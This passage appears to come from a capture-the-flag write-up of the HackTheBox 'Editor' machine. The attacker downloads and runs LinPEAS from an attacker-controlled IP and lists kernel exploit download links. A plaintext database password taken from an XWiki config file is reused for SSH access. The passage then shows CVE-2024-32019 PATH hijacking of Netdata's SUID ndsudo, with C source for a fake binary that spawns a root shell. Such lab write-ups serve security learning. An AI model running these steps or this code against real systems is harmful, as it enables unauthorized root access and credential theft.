drwx------ 2 xwiki xwiki 4096 Nov 7 20:14 jetty-0_0_0_0-8080-root-_-any-183771140518029249
drwx------ 3 xwiki xwiki 4096 Nov 7 20:15 jetty-0_0_0_0-8080-xwiki-_xwiki-any-16614714059127584943
drwx------ 2 xwiki xwiki 4096 Nov 8 00:46 tmux-997
xwiki@editor:/tmp$ wget http://10.10.14.115/linpeas.sh
wget http://10.10.14.115/linpeas.sh
--2025-11-08 12:05:57-- http://10.10.14.115/linpeas.sh
Connecting to 10.10.14.115:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 954437 (932K) [text/x-sh]
Saving to: ‘linpeas.sh’
</details>
linpeas.sh 100%[===================>] 932.07K 613KB/s in 1.5s
2025-11-08 12:05:59 (613 KB/s) - ‘linpeas.sh’ saved [954437/954437]
xwiki@editor:/tmp$ bash linpeas.sh
bash linpeas.sh
<details>
<summary>Click to view text output</summary>
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
. . .[SNIP]. . .
</details>

I'll only go through the parts that matter.

[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: less probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

None of the kernel suggestions are promising (all flagged "less probable" for this Ubuntu 22.04 box), until I realize this:

An XML file. Just as a PHP webapp keeps its credentials in config.php, a Java webapp keeps them in XML config files.
Where to go? Back to our initial spawn point:
/usr/lib/xwiki-jetty
<details>
<summary>Click to view text output</summary>
xwiki@editor:/usr$ ls -al
ls -al
total 104
drwxr-xr-x 14 root root 4096 Feb 17 2023 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 2 root root 36864 Jul 29 11:55 bin
drwxr-xr-x 2 root root 4096 Apr 18 2022 games
drwxr-xr-x 8 root root 4096 Jul 2 10:15 include
drwxr-xr-x 91 root root 4096 Jul 29 11:55 lib
drwxr-xr-x 2 root root 4096 Feb 17 2023 lib32
drwxr-xr-x 2 root root 4096 Jun 13 09:59 lib64
drwxr-xr-x 10 root root 4096 Jun 13 17:07 libexec
drwxr-xr-x 2 root root 4096 Feb 17 2023 libx32
drwxr-xr-x 10 root root 4096 Feb 17 2023 local
drwxr-xr-x 2 root root 20480 Jul 29 11:33 sbin
drwxr-xr-x 122 root root 4096 Jul 29 11:55 share
drwxr-xr-x 4 root root 4096 Jul 29 11:53 src
xwiki@editor:/usr$ cd lib
cd lib
xwiki@editor:/usr/lib$ ls
ls
apparmor mecab
apt mime
binfmt.d modprobe.d
bridge-utils modules
byobu modules-load.d
cnf-update-db multipath
command-not-found mysql
compat-ld nagios
console-setup needrestart
crda networkd-dispatcher
cryptsetup nginx
dbus-1.0 nvidia
debug open-iscsi
dpkg openssh
dracut os-prober
eclipse os-probes
environment.d os-release
file pam.d
finalrd pkgconfig
firmware pm-utils
girepository-1.0 policykit-1
git-core polkit-1
gnupg python2.7
gnupg2 python3
gold-ld python3.10
groff python3.11
grub recovery-mode
grub-legacy rsyslog
hdparm sasl2
ifupdown sftp-server
init software-properties
initcpio ssl
initramfs-tools sysctl.d
jvm systemd
kernel sysusers.d
klibc tc
klibc-BnzSoOUNgFnGkEcRdekugdBENMs.so terminfo
libdmmp.so tmpfiles.d
libdmmp.so.0.2.0 ubiquity
libhandle.so.1 ubuntu-advantage
libhandle.so.1.0.3 ubuntu-fan
libmpathcmd.so ubuntu-release-upgrader
libmpathcmd.so.0 udev
libmpathpersist.so udisks2
libmpathpersist.so.0 update-notifier
libmultipath.so usrmerge
libmultipath.so.0 valgrind
linux X11
linux-boot-probes x86_64-linux-gnu
locale xfsprogs
lsb xwiki
man-db xwiki-jetty
xwiki@editor:/usr/lib$ cd xwiki
cd xwiki
xwiki@editor:/usr/lib/xwiki$ ls -al
ls -al
total 48
drwxr-xr-x 7 root root 4096 Jul 29 11:46 .
drwxr-xr-x 91 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 3 root root 4096 Jul 29 11:46 META-INF
-rw-r--r-- 1 root root 96 Mar 27 2024 redirect
drwxr-xr-x 6 root root 4096 Jun 13 17:05 resources
drwxr-xr-x 3 root root 4096 Jun 13 17:05 skins
drwxr-xr-x 10 root root 20480 Jul 29 11:46 templates
drwxr-xr-x 4 root root 4096 Jul 29 11:48 WEB-INF
xwiki@editor:/usr/lib/xwiki$ ls -al META-INF
ls -al META-INF
total 172
drwxr-xr-x 3 root root 4096 Jul 29 11:46 .
drwxr-xr-x 7 root root 4096 Jul 29 11:46 ..
-rw-r--r-- 1 root root 1656 Mar 27 2024 context.xml
-rw-r--r-- 1 root root 113454 Mar 27 2024 extension.xed
-rw-r--r-- 1 root root 1186 Mar 27 2024 jboss-all.xml
-rw-r--r-- 1 root root 31981 Mar 27 2024 LICENSE
-rw-r--r-- 1 root root 153 Mar 27 2024 MANIFEST.MF
drwxr-xr-x 3 root root 4096 Jun 13 17:05 maven
-rw-r--r-- 1 root root 645 Mar 27 2024 NOTICE
xwiki@editor:/usr/lib/xwiki$ ls -al WEB-INF
ls -al WEB-INF
total 280
drwxr-xr-x 4 root root 4096 Jul 29 11:48 .
drwxr-xr-x 7 root root 4096 Jul 29 11:46 ..
lrwxrwxrwx 1 root root 16 Mar 27 2024 cache -> /etc/xwiki/cache
drwxr-xr-x 2 root root 4096 Jul 29 11:46 classes
lrwxrwxrwx 1 root root 16 Mar 27 2024 fonts -> /etc/xwiki/fonts
lrwxrwxrwx 1 root root 28 Mar 27 2024 hibernate.cfg.xml -> /etc/xwiki/hibernate.cfg.xml
lrwxrwxrwx 1 root root 41 Mar 27 2024 jboss-deployment-structure.xml -> /etc/xwiki/jboss-deployment-structure.xml
lrwxrwxrwx 1 root root 24 Mar 27 2024 jetty-web.xml -> /etc/xwiki/jetty-web.xml
drwxr-xr-x 2 root root 270336 Jul 29 11:46 lib
lrwxrwxrwx 1 root root 22 Mar 27 2024 observation -> /etc/xwiki/observation
lrwxrwxrwx 1 root root 22 Mar 27 2024 portlet.xml -> /etc/xwiki/portlet.xml
lrwxrwxrwx 1 root root 22 Mar 27 2024 sun-web.xml -> /etc/xwiki/sun-web.xml
lrwxrwxrwx 1 root root 29 Mar 27 2024 version.properties -> /etc/xwiki/version.properties
lrwxrwxrwx 1 root root 18 Mar 27 2024 web.xml -> /etc/xwiki/web.xml
lrwxrwxrwx 1 root root 20 Mar 27 2024 xwiki.cfg -> /etc/xwiki/xwiki.cfg
lrwxrwxrwx 1 root root 28 Mar 27 2024 xwiki-locales.txt -> /etc/xwiki/xwiki-locales.txt
lrwxrwxrwx 1 root root 27 Mar 27 2024 xwiki.properties -> /etc/xwiki/xwiki.properties
xwiki@editor:/usr/lib/xwiki$ WEB-INF
</details>
Yep, it should be in one of these. Note that everything in WEB-INF is a symlink into /etc/xwiki:

xwiki@editor:/usr/lib/xwiki/WEB-INF
<details> <summary>Click to view text output</summary>xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls -ltr
ls -ltr
total 272
lrwxrwxrwx 1 root root 27 Mar 27 2024 xwiki.properties -> /etc/xwiki/xwiki.properties
lrwxrwxrwx 1 root root 28 Mar 27 2024 xwiki-locales.txt -> /etc/xwiki/xwiki-locales.txt
lrwxrwxrwx 1 root root 20 Mar 27 2024 xwiki.cfg -> /etc/xwiki/xwiki.cfg
lrwxrwxrwx 1 root root 18 Mar 27 2024 web.xml -> /etc/xwiki/web.xml
lrwxrwxrwx 1 root root 29 Mar 27 2024 version.properties -> /etc/xwiki/version.properties
lrwxrwxrwx 1 root root 22 Mar 27 2024 sun-web.xml -> /etc/xwiki/sun-web.xml
lrwxrwxrwx 1 root root 22 Mar 27 2024 portlet.xml -> /etc/xwiki/portlet.xml
lrwxrwxrwx 1 root root 22 Mar 27 2024 observation -> /etc/xwiki/observation
lrwxrwxrwx 1 root root 41 Mar 27 2024 jboss-deployment-structure.xml -> /etc/xwiki/jboss-deployment-structure.xml
lrwxrwxrwx 1 root root 28 Mar 27 2024 hibernate.cfg.xml -> /etc/xwiki/hibernate.cfg.xml
lrwxrwxrwx 1 root root 16 Mar 27 2024 fonts -> /etc/xwiki/fonts
lrwxrwxrwx 1 root root 16 Mar 27 2024 cache -> /etc/xwiki/cache
lrwxrwxrwx 1 root root 24 Mar 27 2024 jetty-web.xml -> /etc/xwiki/jetty-web.xml
drwxr-xr-x 2 root root 270336 Jul 29 11:46 lib
drwxr-xr-x 2 root root 4096 Jul 29 11:46 classes
xwiki@editor:/usr/lib/xwiki/WEB-INF$
</details>
Until I found it:

Password:
theEd1t0rTeam99
However, it seems to belong to the MySQL user, so perhaps this is the password protecting the MySQL database?
But MySQL does not even seem to be active:
<details>
<summary>Click to view text output</summary>
xwiki@editor:/usr/lib/xwiki/WEB-INF$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:ing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
xwiki@editor:/usr/lib/xwiki/WEB-INF$
</details>
Suppose this might be a re-used password for the local user as well. Let's test it:
xwiki@editor:/home$ su oliver
su oliver
Password: theEd1t0rTeam99
su: Authentication failure
xwiki@editor:/home$ su oliver
su oliver
Password: Ed1t0rTeam99
su: Authentication failure
xwiki@editor:/home$
Nope, not working. But with an SSH login, it works:
┌──(kali㉿kali)-[~]
└─$ netexec ssh editor.htb -u oliver -p 'Ed1t0rTeam99'
SSH 10.10.11.80 22 editor.htb [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH 10.10.11.80 22 editor.htb [-] oliver:Ed1t0rTeam99
┌──(kali㉿kali)-[~]
└─$ netexec ssh editor.htb -u oliver -p theEd1t0rTeam99
SSH 10.10.11.80 22 editor.htb [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH 10.10.11.80 22 editor.htb [+] oliver:theEd1t0rTeam99 Linux - Shell access!
User: oliver
Passwd: theEd1t0rTeam99
SSH in:
┌──(kali㉿kali)-[~]
└─$ sudo ssh oliver@editor.htb
[sudo] password for kali:
oliver@editor.htb’s password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of
System load: 0.06 Processes: 255
Usage of /: 79.3% of 7.28GB Users logged in: 0
Memory usage: 60% IPv4 address for eth0: 10.10.11.80
Swap usage: 0%
=> There is 1 zombie process.
Expanded Security Maintenance for Applications is not enabled.
4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login:
oliver@editor:~$
- Road to root PrivEsc
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
oliver@editor:~$ groups
oliver netdata
oliver@editor:~$ sudo -i
[sudo] password for oliver:
oliver is not in the sudoers file. This incident will be reported.
oliver@editor:~$ sudo -l
[sudo] password for oliver:
Sorry, user oliver may not run sudo on editor.
oliver@editor:~$ ls -al
total 36
drwxr-x--- 4 oliver oliver 4096 Nov 8 00:57 .
drwxr-xr-x 3 root root 4096 Jul 8 08:34 ..
lrwxrwxrwx 1 root root 9 Jul 1 19:19 .bash_history -> /dev/null
-rw-r--r-- 1 oliver oliver 220 Jun 13 09:45 .bash_logout
-rw-r--r-- 1 oliver oliver 3771 Jun 13 09:45 .bashrc
drwx------ 2 oliver oliver 4096 Jul 8 08:34 .cache
drwxrwxr-x 3 oliver oliver 4096 Nov 8 00:57 .local
-rw-rw-r-- 1 oliver oliver 201 Nov 8 00:57 poc.go
-rw-r--r-- 1 oliver oliver 807 Jun 13 09:45 .profile
-rw-r----- 1 root oliver 33 Nov 7 20:14 user.txt
oliver@editor:~$
</details>
<details>
<summary>Click to view text output</summary>
oliver@editor:/tmp$ mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,relatime,hidepid=invisible)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=1944860k,nr_inodes=486215,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec,relatime,size=400572k,mode=755,inode64)
/dev/sda2 on / type ext4 (rw,relatime)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,inode64)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k,inode64)
cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=19489)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
tracefs on /sys/kernel/tracing type tracefs (rw,nosuid,nodev,noexec,relatime)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,nosuid,nodev,noexec,relatime)
configfs on /sys/kernel/config type configfs (rw,nosuid,nodev,noexec,relatime)
none on /run/credentials/systemd-sysusers.service type ramfs (ro,nosuid,nodev,noexec,relatime,mode=700)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=400568k,nr_inodes=100142,mode=700,uid=1000,gid=1000,inode64)
oliver@editor:/tmp$
</details>
Nothing yet from the simple checklists. Let's run LinPEAS and look for something to use.
For now, what we know from groups is that we are part of netdata and not in the sudoers.
oliver@editor:/tmp$ bash linpeas.sh
<details>
<summary>Click to view text output</summary>
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : https://training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
LinPEAS-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner’s permission.
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
. . .[SNIP]. . .
</details>
I don't think our PrivEsc is the port-forwarding type, even if LinPEAS flags it as high:

Netstat:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8125 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:19999 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:43093 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8079 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
Looking at the LinPEAS output again, Netdata seems to have a hole in it as well:
<details>
<summary>Click to view text output</summary>
-rw-r--r-- 1 root root 374 Apr 1 2024 /opt/netdata/usr/lib/netdata/conf.d/go.d/redis.conf
jobs:
- name: local
address: 'unix://@/tmp/redis.sock'
- name: local
address: 'unix://@/var/run/redis/redis.sock'
- name: local
address: 'unix://@/var/lib/redis/redis.sock'
-rw-r--r-- 1 root root 1622 Apr 1 2024 /opt/netdata/usr/lib/netdata/conf.d/health.d/redis.conf
template: redis_connections_rejected
on: redis.connections
class: Errors
type: KV Storage
component: Redis
lookup: sum -1m unaligned of rejected
every: 10s
units: connections
warn: $this > 0
summary: Redis rejected connections
info: Connections rejected because of maxclients limit in the last minute
delay: down 5m multiplier 1.5 max 1h
to: dba
template: redis_bgsave_broken
on: redis.bgsave_health
class: Errors
type: KV Storage
component: Redis
every: 10s
calc: $last_bgsave != nan AND $last_bgsave != 0
crit: $this
units: ok/failed
summary: Redis background save
info: Status of the last RDB save operation (0: ok, 1: error)
delay: down 5m multiplier 1.5 max 1h
to: dba
template: redis_bgsave_slow
on: redis.bgsave_now
class: Latency
type: KV Storage
component: Redis
every: 10s
calc: $current_bgsave_time
warn: $this > 600
crit: $this > 1200
units: seconds
summary: Redis slow background save
info: Duration of the on-going RDB save operation
delay: down 5m multiplier 1.5 max 1h
to: dba
template: redis_master_link_down
on: redis.master_link_down_since_time
class: Errors
type: KV Storage
component: Redis
every: 10s
calc: $time
units: seconds
crit: $this != nan AND $this > 0
summary: Redis master link down
info: Time elapsed since the link between master and slave is down
delay: down 5m multiplier 1.5 max 1h
to: dba
</details>
Here we found some SUID binaries; the interesting one is ndsudo, which is owned by root and executable by the netdata group.

/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
<details>
<summary>Click to view text output</summary>
oliver@editor:/tmp$ find / -perm -u=s -type f 2>/dev/null | xargs ls -l
-rwsr-x--- 1 root netdata 965056 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
-rwsr-x--- 1 root netdata 4261672 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
-rwsr-x--- 1 root netdata 81472 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping
-rwsr-x--- 1 root netdata 1144224 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
-rwsr-x--- 1 root netdata 200576 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 1377624 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
-rwsr-x--- 1 root netdata 896448 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
-rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn
-rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount
-rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 232416 Jun 25 12:48 /usr/bin/sudo
-rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-x 1 root root 338536 Apr 11 2025 /usr/lib/openssh/ssh-keysign
oliver@editor:/tmp$
</details>
Luckily, we are now the oliver user, who is in the netdata group, so we can execute it.

We might be able to substitute our own binary for one of the executables it looks up.
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo -h
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
--test
print the generated command that will be run, without running it.
--help
print this message.
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : nvme-smart-log
Executables: nvme
Parameters : smart-log {{device}} --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
- Command : megacli-battery-info
Executables: megacli MegaCli
Parameters : -AdpBbuCmd -aAll -NoLog
- Command : arcconf-ld-info
Executables: arcconf
Parameters : GETCONFIG 1 LD
- Command : arcconf-pd-info
Executables: arcconf
Parameters : GETCONFIG 1 PD
The program searches for executables in the system path.
Variables given as {{variable}} are expected on the command line as:
--variable VALUE
VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
- CVE-2024-32019 with Binary in C for root Access
This step is going to be about binary hijacking.
Note: there's an automated exploit for this case, but I'd like to make it understandable with a C binary, so we'll do it manually.

I finally came across CVE-2024-32019 and decided to craft a malicious C source file like this:
#include <unistd.h>
#include <stdlib.h>

int main(void) {
    /* ndsudo runs us with root privileges; make the real uid/gid 0 as well
     * so bash does not drop the effective root id on startup. */
    setuid(0);
    setgid(0);
    /* Replace this process with an interactive bash as root. */
    execl("/bin/bash", "bash", "-i", (char *)NULL);
    return 0; /* only reached if execl fails */
}
We call it megacli, then compile it:
┌──(kali㉿kali)-[~]
└─$ sudo gcc megacli.c -o megacli -g

Great, the code already sets the UID/GID to 0 and execs a shell.


Make it executable on the target machine:
oliver@editor:/tmp$ ls -al
total 60
drwxrwxrwt 10 root root 4096 Nov 8 12:51 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
-rwxrwxr-x 1 oliver oliver 17376 Nov 8 12:50 megacli
srwxrwx--- 1 netdata netdata 0 Nov 7 20:14 netdata-ipc
. . .[SNIP]. . .
A note from me: basically, set the PATH first before execution:
oliver@editor:/tmp$ ndsudo megacli-disk-info
ndsudo: command not found
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
megacli MegaCli : not available in PATH.
oliver@editor:/tmp$
As you can see, ndsudo is looking for megacli or MegaCli in the PATH; that's the point we can leverage by creating a malicious binary and placing it in the PATH to hijack the megacli command.
But... we failed. Let's try other options, like the nvme one:
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo -h
. . .[SNIP]. . .
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
nvme : not available in PATH.
oliver@editor:~$
And we failed again. Let's check the PATH:
oliver@editor:~$ $PATH
-bash: /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin: No such file or directory
oliver@editor:~$
Oh okay, the fake path is not set yet. Let's re-run, but I also want to change my C source into:
┌──(kali㉿kali)-[~]
└─$ cat nvme.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* Same idea as megacli.c: become root for real, then hand over to bash. */
    setuid(0);
    setgid(0);
    /* Non-interactive bash is enough here; it inherits our terminal anyway. */
    execl("/bin/bash", "bash", (char *)NULL);
    return 0; /* only reached if execl fails */
}
Continuing on the attack side:
<details>
<summary>Click to view text output</summary>
